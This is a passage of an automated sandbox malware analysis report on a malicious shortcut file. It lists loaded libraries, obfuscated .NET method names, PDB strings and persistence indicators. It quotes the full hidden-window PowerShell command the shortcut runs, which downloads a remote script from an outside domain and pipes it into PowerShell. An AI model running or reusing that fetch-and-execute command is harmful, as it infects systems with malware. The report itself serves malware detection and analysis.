                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: websocket.dllJump to behavior
                Source: jKSjtQ8W7O.lnkLNK file: ..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: Google Drive.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: YouTube.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Sheets.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Gmail.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Slides.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Docs.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: \??\C:\Windows\System.pdb( source: powershell.exe, 0000000A.00000002.1692468917.000001985A9BF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: klib.pdbx source: powershell.exe, 0000000A.00000002.1693221030.000001985AA88000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Adobe.pdb source: powershell.exe, 0000000A.00000002.1693611434.000001985AE70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1679172209.0000019852571000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000A.00000002.1692468917.000001985A9BF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660114048.0000019842360000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: .pdb,4@v source: powershell.exe, 0000000A.00000002.1660114048.0000019842427000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 0000000A.00000002.1692468917.000001985A9BF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ,.pdb source: powershell.exe, 0000000A.00000002.1660114048.0000019842427000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: m.pdb4 source: powershell.exe, 0000000A.00000002.1693221030.000001985AA88000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.pdb source: powershell.exe, 0000000A.00000002.1660114048.0000019842360000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, bTH3JYM6xmCPaL8sQ1f.cs.Net Code: Type.GetTypeFromHandle(o46K2WTSAHbI7r65MkF.VGrK7e8qZB(16777274)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(o46K2WTSAHbI7r65MkF.VGrK7e8qZB(16777255)),Type.GetTypeFromHandle(o46K2WTSAHbI7r65MkF.VGrK7e8qZB(16777311))})
                Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, bTH3JYM6xmCPaL8sQ1f.cs.Net Code: Type.GetTypeFromHandle(o46K2WTSAHbI7r65MkF.VGrK7e8qZB(16777274)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(o46K2WTSAHbI7r65MkF.VGrK7e8qZB(16777255)),Type.GetTypeFromHandle(o46K2WTSAHbI7r65MkF.VGrK7e8qZB(16777311))})
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.ministryof.gov.pk; nslookup www.Elpson.com; nslookup www.mproton.com; start https://pmo.gov.pk/site/404; $did='enpont.xyz/'; &('i'+'r'+'m') http://ministryofficedownloadcloudserver.scre$did/78/|Powershell
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.ministryof.gov.pk; nslookup www.Elpson.com; nslookup www.mproton.com; start https://pmo.gov.pk/site/404; $did='enpont.xyz/'; &('i'+'r'+'m') http://ministryofficedownloadcloudserver.scre$did/78/|Powershell
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4ADD5AEF push FFFFFFE8h; retf 0_2_00007FFB4ADD5AF1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4ADD7967 push ebx; retf 0_2_00007FFB4ADD796A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4ADD00BD pushad ; iretd 0_2_00007FFB4ADD00C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFB4ADE0C2D push esp; retf 10_2_00007FFB4ADE0C2E
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFB4ADD00BD pushad ; iretd 10_2_00007FFB4ADD00C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFB4ADD09AD push ss; iretd 10_2_00007FFB4ADD09C6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFB4ADD776A pushad ; iretd 10_2_00007FFB4ADD785D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFB4ADD785E push eax; iretd 10_2_00007FFB4ADD786D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFB4B213D20 pushfd ; ret 10_2_00007FFB4B213D23
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFB4B21096D push 8B48FFC1h; iretd 10_2_00007FFB4B210972
                Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, YqMKhJt51X4Ky0NobLY.csHigh entropy of concatenated method names: 's7qtRaBg4y', 'aPy54iFhWjAJZ1xOGtP', 'c5sK6nFeujjYGYRNToT', 'nEpU6DFODodHnrYlcku', 'vs3FExF8BSNtyV1JgjU', 'eYmZjfFLfCIdD8CQRLm'
                Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, uiew8mTUhcOb3RQF7Wa.csHigh entropy of concatenated method names: 'rnFTZh7weN', 'stCTzmCKqu', 'IQQuvFar7r', 'VwYut3TNVX', 'zI9uiSVgB4', 'J3buMSt0qH', 'yFCu3N1GN4', 'P0luTGOEYw', 'I6KuunLJuT', 'HSPuwa7hFM'
                Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, HYyMoMtWkqmWOB5JMqe.csHigh entropy of concatenated method names: 'qKkbxgBEoHEQlOmBmgI', 'cVhXFeBBWR2EpvFoeic', 'ub31o2BXx14TVhc8CgB', 'dtBMk1BFgCsUd1PqDQb', 'YoYnQpB1D3mCm7qtfxb', 'Wfl4QcBD5OePPT2MLVO', 'C6FtC2GOQa', 'sTttQrjDRY', 'tIDtVdHo13', 'QJutYPCqVB'
                Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, C1NXrkc3UvioZEYQrK.csHigh entropy of concatenated method names: 'QcHKi73qq', 'jrvSaoyUB', 'Q4VH3X6FU', 'ANs5qVYlT', 'B9qI3WEKh', 'IFnh6nfr3hOoQh27fCq', 'dLqVe1fjM7JqQbO4xBu', 'g2sQDefaNdZpqyHy5fH', 'GSyKFdff9dmyv06xfcC', 'TrlGSvfq0QawsGjVjQk'
                Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, WsClient.csHigh entropy of concatenated method names: 'P891b0WnD', 'XuiwRQaAryJ62Yhm1EX', 'Thq7OvaxRLPUm9fL0N2', 'SGQ0x7a44Y0YuQQZcF0', 'SBPWMTayihLdcVGG6mE', 'yVie07abhXtMfYhIDGf', 'IjrsBwacdVrRuwjrbAL', 'MoveNext', 'MoveNext', 'SetStateMachine'
                Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, Sign.csHigh entropy of concatenated method names: 'KhHATYqnE', 'xMLxm5f87EAgcxrrRn9', 'Rg94ecfLJ7dEM5a56bc', 'tjr52ffhYi1qomX3JuR', 'DIvCImfe2sOk0gqeXfU', 'nT8GcwMXo', 'tcJPO2WnJ', 'r168cmfE2hG6htQDyn1', 'vNwCBgfFIDdKrk4NUUN', 'tiu0pUfBDUDPgIVAQGn'
                Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, ftlHK9iNVHsUovuLfTN.csHigh entropy of concatenated method names: 'YNDiSKZNK5', 'CjSg4p19snO2yoJaRhU', 'Xkblvk1gtGYoB5pPvIn', 'A5jBE91oy7COmSAgWru', 'jqvmbi10SxbMyxpTdJp', 'RMwIGo1JFXEWlJJD6t3'
                Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, fO2tNXn9jw3QJbOlhx.csHigh entropy of concatenated method names: 'spWZ4g2DZ', 'O5czEikd4', 'La5tvksoI0', 'lEfttEg0S2', 'e9WtiBGNiV', 'KU2JC9lqW3t62myoZtI', 'vQyx3jleObE0F1LeGqT', 'dU95balOesG7a604COG', 'cGD524l2kPHw5fGMbdd', 'UEVq22lrMcLmpeXWidf'
                Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, bTH3JYM6xmCPaL8sQ1f.csHigh entropy of concatenated method names: 'W3TTnrdHYQAU0gCbLOv', 'LPI9xTd5L7heHm3qxXh', 'TTuT2DZnCl', 'RPSJ1Ed6fahDA5qnaSR', 'QdgRNOdGGLKlRSbu3ra', 'XoE78OdPjrctZT1Qmnf', 'AMSk2Ud0KIx05jVaKB9', 'NCUaXbdJSIL38FYfoMw', 'm8uCGCd9IXH8I9sTXyq', 'X7ERAYdgylU7CTAoiBa'
                Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, muKlemtUJb9FDY9MpyK.csHigh entropy of concatenated method names: 'lbXtGHdsP8', 'RELuWwFjFAUW44IVKPc', 'fIc2WkFaPR7imTP8JmC', 'EYKNLdFfBX4c5SoU1iG', 'OH5spZF23SSXjspaeyr', 'qIh2nMFrn1GsscK1oic'
                Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, oy9Q57ixYXL6eDBsPUs.csHigh entropy of concatenated method names: 'Aq6icvUVg0', 'dM5hXN1UDubTghNyY5A', 'iuuHGH163oWQpyvjCwy', 'ECOrgU1GYiB8BtUE5f2', 'si7r121I4QAAkfZJHcZ', 'zlPg4K1RHLa7yCUNaUJ'
                Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, wAsBrhumJTLpHXMnaSZ.csHigh entropy of concatenated method names: 'ajWQf8Vyhf', 'W1XQlDmTnA', 'x7LQBturIK', 'eUHQXbHGjC', 'SYvQE7seDc', 'WnvQFVOasF', 'cTlQ1WZJix', 'AGJusBkkSj', 'Tr2QDbehep', 'KaBQd33BGk'
                Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, ucPbfPJwI9dD5uyIC9.csHigh entropy of concatenated method names: 'EQLg8sV2b', 'jEQvCKfo9WVKkh0eJDZ', 'dqSTL3fkwGwhtI4K76s', 'eqA6yefnQqqSpxrr6kg', 'vLsXXaf7oORFvJbPtdT', 'eOM5PRf9eUgjUHAR5Vk', 'PEoPv6fgUt9uhLhvpKm'
                Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, YqMKhJt51X4Ky0NobLY.csHigh entropy of concatenated method names: 's7qtRaBg4y', 'aPy54iFhWjAJZ1xOGtP', 'c5sK6nFeujjYGYRNToT', 'nEpU6DFODodHnrYlcku', 'vs3FExF8BSNtyV1JgjU', 'eYmZjfFLfCIdD8CQRLm'
                Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, uiew8mTUhcOb3RQF7Wa.csHigh entropy of concatenated method names: 'rnFTZh7weN', 'stCTzmCKqu', 'IQQuvFar7r', 'VwYut3TNVX', 'zI9uiSVgB4', 'J3buMSt0qH', 'yFCu3N1GN4', 'P0luTGOEYw', 'I6KuunLJuT', 'HSPuwa7hFM'
                Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, HYyMoMtWkqmWOB5JMqe.csHigh entropy of concatenated method names: 'qKkbxgBEoHEQlOmBmgI', 'cVhXFeBBWR2EpvFoeic', 'ub31o2BXx14TVhc8CgB', 'dtBMk1BFgCsUd1PqDQb', 'YoYnQpB1D3mCm7qtfxb', 'Wfl4QcBD5OePPT2MLVO', 'C6FtC2GOQa', 'sTttQrjDRY', 'tIDtVdHo13', 'QJutYPCqVB'
                Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, C1NXrkc3UvioZEYQrK.csHigh entropy of concatenated method names: 'QcHKi73qq', 'jrvSaoyUB', 'Q4VH3X6FU', 'ANs5qVYlT', 'B9qI3WEKh', 'IFnh6nfr3hOoQh27fCq', 'dLqVe1fjM7JqQbO4xBu', 'g2sQDefaNdZpqyHy5fH', 'GSyKFdff9dmyv06xfcC', 'TrlGSvfq0QawsGjVjQk'
                Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, WsClient.csHigh entropy of concatenated method names: 'P891b0WnD', 'XuiwRQaAryJ62Yhm1EX', 'Thq7OvaxRLPUm9fL0N2', 'SGQ0x7a44Y0YuQQZcF0', 'SBPWMTayihLdcVGG6mE', 'yVie07abhXtMfYhIDGf', 'IjrsBwacdVrRuwjrbAL', 'MoveNext', 'MoveNext', 'SetStateMachine'
                Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, Sign.csHigh entropy of concatenated method names: 'KhHATYqnE', 'xMLxm5f87EAgcxrrRn9', 'Rg94ecfLJ7dEM5a56bc', 'tjr52ffhYi1qomX3JuR', 'DIvCImfe2sOk0gqeXfU', 'nT8GcwMXo', 'tcJPO2WnJ', 'r168cmfE2hG6htQDyn1', 'vNwCBgfFIDdKrk4NUUN', 'tiu0pUfBDUDPgIVAQGn'
                Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, ftlHK9iNVHsUovuLfTN.csHigh entropy of concatenated method names: 'YNDiSKZNK5', 'CjSg4p19snO2yoJaRhU', 'Xkblvk1gtGYoB5pPvIn', 'A5jBE91oy7COmSAgWru', 'jqvmbi10SxbMyxpTdJp', 'RMwIGo1JFXEWlJJD6t3'
                Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, fO2tNXn9jw3QJbOlhx.csHigh entropy of concatenated method names: 'spWZ4g2DZ', 'O5czEikd4', 'La5tvksoI0', 'lEfttEg0S2', 'e9WtiBGNiV', 'KU2JC9lqW3t62myoZtI', 'vQyx3jleObE0F1LeGqT', 'dU95balOesG7a604COG', 'cGD524l2kPHw5fGMbdd', 'UEVq22lrMcLmpeXWidf'
                Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, bTH3JYM6xmCPaL8sQ1f.csHigh entropy of concatenated method names: 'W3TTnrdHYQAU0gCbLOv', 'LPI9xTd5L7heHm3qxXh', 'TTuT2DZnCl', 'RPSJ1Ed6fahDA5qnaSR', 'QdgRNOdGGLKlRSbu3ra', 'XoE78OdPjrctZT1Qmnf', 'AMSk2Ud0KIx05jVaKB9', 'NCUaXbdJSIL38FYfoMw', 'm8uCGCd9IXH8I9sTXyq', 'X7ERAYdgylU7CTAoiBa'
                Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, muKlemtUJb9FDY9MpyK.csHigh entropy of concatenated method names: 'lbXtGHdsP8', 'RELuWwFjFAUW44IVKPc', 'fIc2WkFaPR7imTP8JmC', 'EYKNLdFfBX4c5SoU1iG', 'OH5spZF23SSXjspaeyr', 'qIh2nMFrn1GsscK1oic'
                Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, oy9Q57ixYXL6eDBsPUs.csHigh entropy of concatenated method names: 'Aq6icvUVg0', 'dM5hXN1UDubTghNyY5A', 'iuuHGH163oWQpyvjCwy', 'ECOrgU1GYiB8BtUE5f2', 'si7r121I4QAAkfZJHcZ', 'zlPg4K1RHLa7yCUNaUJ'
                Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, wAsBrhumJTLpHXMnaSZ.csHigh entropy of concatenated method names: 'ajWQf8Vyhf', 'W1XQlDmTnA', 'x7LQBturIK', 'eUHQXbHGjC', 'SYvQE7seDc', 'WnvQFVOasF', 'cTlQ1WZJix', 'AGJusBkkSj', 'Tr2QDbehep', 'KaBQd33BGk'
                Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, ucPbfPJwI9dD5uyIC9.csHigh entropy of concatenated method names: 'EQLg8sV2b', 'jEQvCKfo9WVKkh0eJDZ', 'dqSTL3fkwGwhtI4K76s', 'eqA6yefnQqqSpxrr6kg', 'vLsXXaf7oORFvJbPtdT', 'eOM5PRf9eUgjUHAR5Vk', 'PEoPv6fgUt9uhLhvpKm'

                Persistence and Installation Behavior

                barindex
                Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
